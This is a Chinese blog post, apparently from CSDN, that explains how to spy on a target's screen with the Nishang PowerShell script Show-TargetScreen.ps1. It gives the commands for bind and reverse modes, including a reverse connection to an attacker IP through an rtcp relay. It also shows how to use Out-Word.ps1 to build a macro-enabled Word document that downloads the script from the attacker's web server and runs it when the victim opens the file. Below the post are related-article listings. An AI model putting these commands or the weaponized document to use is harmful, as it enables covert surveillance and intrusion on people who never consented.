使用Powershell对目标进行屏幕监控

最新推荐文章于 2024-05-15 17:46:40 发布
最新推荐文章于 2024-05-15 17:46:40 发布
阅读量2.5k 收藏 5
点赞数 1

0x00前言

Nishang是基于PowerShell的渗透测试专用工具。集成了框架、脚本和各种payload。这些脚本是由Nishang的作者在真实渗透测试过程中有感而发编写的,具有实战价值。包括了下载和执行、键盘记录、dns、延时命令等脚本。今天要给大家介绍的是如何通过powershell对目标的屏幕进行实时监控。

脚本下载地址如下:

https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Show-TargetScreen.ps1

使用也很简单,脚本包括了reverse以及bind模式。下面是使用示例:

0x01 Bind模式:

PS C:\Users\evi1cg\Desktop> . .\Show-TargetScreen.ps1
PS C:\Users\evi1cg\Desktop> Show-TargetScreen -Bind -Port 3333

然后在自己的计算机上使用火狐访问目标3333端口,结果如下图:


0x02Reverse模式

attacker:
 在这里可以使用创宇的py脚本转发:
 https://github.com/knownsec/rtcp
 执行:
rtcp [master]            python rtcp.py l:5555 l:4444                 
监听本地5555端口以及4444端口。
 之后在target执行: 
PS C:\Users\evi1cg\Desktop> . .\Show-TargetScreen.ps1
PS C:\Users\evi1cg\Desktop> Show-TargetScreen -Reverse-IPAddress 192.168.74.1 -Port 5555
效果截图:


0x03 使用Powershell Client

Out-Word.ps1作为演示示例:

生成word文件:

PS C:\Users\evi1cg\Desktop> . .\Out-Word.ps1
PS C:\Users\evi1cg\Desktop> Out-Word -PayloadURL"http://192.168.74.1/Show-TargetScreen.ps1" -Arguments"Show-TargetScreen 
   -Reverse -IPAddress 192.168.74.1 -Port 6666"

之后将Show-TargetScreen.ps1放在我们的web根目录:
测试:


开启监听:

rtcp [master]     python rtcp.py l:6666 l:4444

当运行开启office宏的word时,我们就可对其屏幕进行监控,如下图:


FLy_鹏程万里
关注
专栏目录
PowerShell监控——监控电脑屏幕操作记录
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
03-01 1971
目录 监控电脑屏幕? 实现思路 1、通过windows脚本,一定时间间隔进行屏幕抓拍 2、脚本通过powershell语言实现 3、powershell为windows系统自带语言,可以无缝嵌入运行 4、所有抓拍的屏幕照片,按照时间排序,可以实现比较完整的用户操作监控PowerShell简介 如何使用PowerShell 监控屏幕脚本实现 监控电脑屏幕? 如何实现对电脑屏幕及其操作的监控? 对于屏幕监控,一般都是针对windows操作系统 因为对于大部分Linux系统,都是无
记录一举一动:PowerShell几行代码实现定期屏幕截屏
热门推荐
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
12-13 1万+
如何使用powershell进行屏幕记录
PowerShell定时抓取屏幕图像
weixin_34283445的博客
10-07 1272
昨天的博文写了定时记录操作系统行为,其实说白了就是抓取了击键的记录和对应窗口的标题栏,而很多应用程序标题栏又包含当时记录的文件路径和文件名,用这种方式可以大致记录操作了哪些程序,打开了哪些文件,以及敲击了哪些按键。事实上这样记录操作系统的行为显得相对单薄一点,因为记录的内容不太形象,对于新手来说太过于隐晦了,对于人类来说,图像会比文字更加有利于用户理解。当操作系统不方便装屏幕记录软件,但...
监控渗透测试中powershell白名单利用行为
12306小哥
05-08 709
简介 您可以使用PowerShell.exe从另一个工具(例如Cmd.exe)的命令行启动PowerShell会话,也可以在PowerShell命令行启动新会话。从此处阅读Microsoft Windows官方网站上的更多信息。 补充说明:在高版本powershell(V5以上含V5)中,可以通过配置策略,对进程命令行参数进行记录,具体策略可参考powershell事件。同样也可以在不同版本操作系统中部署sysmon,通过sysmon日志进行监控。 基础日志 windows 安全日志/SYSMON日志(需要
power shell 截图保存
taoli188的博客
07-26 1365
power shell 截图保存 Add-Type -AssemblyName system.drawing Add-Type -AssemblyName System.Windows.Formsv $bitmap=New-Object System.Drawing.Bitmap $bitmap=[System.Drawing.Bitmap]::new(".\123.png") # 获取指定位置 RGB 颜色 # $color=$bitmap.GetPixel(100,100) $graphics=[S
监控网卡流量的shell脚本
weixin_34380948的博客
11-25 245
本脚本来自有学习阿铭的博文学习:公司网络偶尔出现网卡问题,将陷入业务瘫痪,造成不可挽回的损失。所以需要时常监控。提示:本文中的S全部都$符,不要问为什么,马云爸爸的社区就这样。 #!/bin/bash #用途:监控网卡流量的shell脚本。 #作者:Caron maktini #日期:2018年11月23日 #版本:v0.1 #要求如下:每分钟检测一次网...
powershell 监控
10-20
此外,Nishang是基于PowerShell的渗透测试专用工具,其中包括了下载和执行、键盘记录、dns、延时命令等脚本,可以用于实现对目标屏幕进行实时监控。总之,PowerShell监控是一种非常实用的监控方法,可以帮助用户...
APT35 利用 Log4j 漏洞传播新的模块化 PowerShell 工具包
wdj_yyds的博客
01-22 3076
随着Log4j安全漏洞的出现,研究人员已经看到多个攻击者(主要是出于经济动机)立即将其添加到他们的武器库中。毫不奇怪,一些由国家支持的攻击者也将这个新漏洞视为在潜在目标,在受影响系统修复这个漏洞之前寻找发动攻击的机会。 APT35(又名 Charming Kitten、TA453 或 Phosphorus)被怀疑是由伊朗国家支持的黑客组织,在漏洞被披露后仅仅四天,就开始在公开系统中广泛扫描并试图利用Log4j漏洞。攻击者的攻击设置显然是仓促的,因为他们使用了基本的开源工具进行攻击,并基于之前的基础设施进行
psfetch:流行的 Bash 屏幕截图系统信息实用程序(即 screenFetch)的 PowerShell 实现。
07-10
PSFetch.ps1 什么是 PSFetch? PowerShell 中内置的 Bash 屏幕截图系统信息实用程序 (screenFetch) 的流行实现。 与和相似(在 ,没有 LUA 或不同命令外壳的依赖项。 此脚本 100% 使用 PowerShell 编写。 指示 将存储库克隆到您的配置文件下的文件夹中。 cd %UserProfile% git clone https://github.com/mikepruett3/psfetch.git psfetch 将 repo 克隆到您的用户配置文件后,只需将此 PowerShell 脚本放在您路径中的某个位置,或者在您路径中已有的文件夹中创建指向该脚本的链接... PS > mklink %SystemRoot%\System32\psfetch.ps1 %UserProfile%\psfetch\psfetch.ps1
cmd 指令 截图
04-03
辛苦整理了一部分cmd指令的效果图,windows7的
Invoke-Parallel:通过简化的多线程加速PowerShell
02-21
并行调用 该函数将接受一个脚本或脚本块,并针对指定的对象并行运行它。 它使用运行空间,因为在许多情况下不适合使用作业或PSRemoting。 指示 # Download and unblock the file(s). # Dot source the file. . " \\Path\To\Invoke-Parallel.ps1 " # Get help for the function Get-Help Invoke-Parallel - Full # Use Invoke-Parallel with variables in your session $Number = 2 1 .. 10 | Invoke-Parallel - ImportVariables - ScriptBlock { $Number * $_ } # Use the $Usin
powershell 防止休眠或屏幕关闭并定时截屏保存
最新发布
HoKis
05-15 385
因工作需要,需要在用户的机器上进行操作,有些工作比较耗时、耗CPU,配置也不高,因而就不能用这台机器同时干太多活,又不能干盯着啥也干不了,但是一段时间不操作,机器很快就进入屏保。那么,不如搞个脚本,定时模拟键盘按下,那就不会进入屏保了,同时加一个截屏功能,还可以回看过程。
统计对象在PowerShell 3.0中的改进
Anders's Blog
06-18 931
placeholder
PowerShell 多线程的使用
weixin_34191734的博客
04-06 1301
今天一个朋友问我在Powershell里面如何能够并发的ping上万台机器?默认的test-connection 尽管有-computer这个参数,他的方式是按顺序的挨个ping,全部跑下来可能有好几个小时。比如我需要花18秒的时间才能ping完40台服务器,如果成千上万的话就很费时间了。measure-commnd -expression { $computers=Get-ADComputer ...
Powershell 并发任务 | Runspace 线程 | 结果获取
梓芮
01-30 876
PowerShell进行多任务处理(Multithreading 或 Parallel Processing)主要目的是提高脚本的执行效率和性能。对于需要处理大量数据或执行多个独立任务的脚本来说尤其有用。多任务处理允许脚本同时执行多个任务,从而加快整体执行速度。对于需要处理大型数据集或执行耗时的操作时尤为重要。现代计算机配备了多核处理器。通过多任务处理,可以充分发挥这些多核处理器的性能,提高整体计算能力。在某些情况下,脚本需要执行多个相互独立的任务。
【Win】使用 PowerShell 命令获取计算机硬件信息
u012153104的博客
08-14 3010
在管理和维护计算机系统时,获取计算机硬件信息是非常重要的。了解硬件配置可以帮助我们更好地了解系统的性能和可扩展性,识别问题并进行故障排除。当你想要获取计算机系统信息时,PowerShell 是一个强大的工具。在此,我们将介绍如何使用 PowerShell 获取计算机的 BIOS 版本、操作系统信息、CPU 型号、内存信息、显卡信息、磁盘驱动器信息和网络适配器信息。首先,我们需要使用命令来替代过时的命令。这样可以提高代码的效率,并且是 PowerShell 中较新的命令。
《实训笔记》
m0_67348657的博客
04-07 737
一,NMAP nmap-扫描器之王,主要收集目标主机的相关信息,主要包括端口、服务、漏洞等信息。 Nmap的主要操作命令: -A开启操作系统识别和版本识别功能。 -T 设置扫描的快慢,0-6档,0最慢,6最快,越快越容易被发现。 Nmap后加IP地址可以扫描单或多个目标。 -iL 表示要扫描的目标位于一个文档中。 --exclude表示排除在外的目标。 --excludefile ~/targets.txt表示排除在外的目标包含的文档 -p 80,443表示扫描特点端口...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值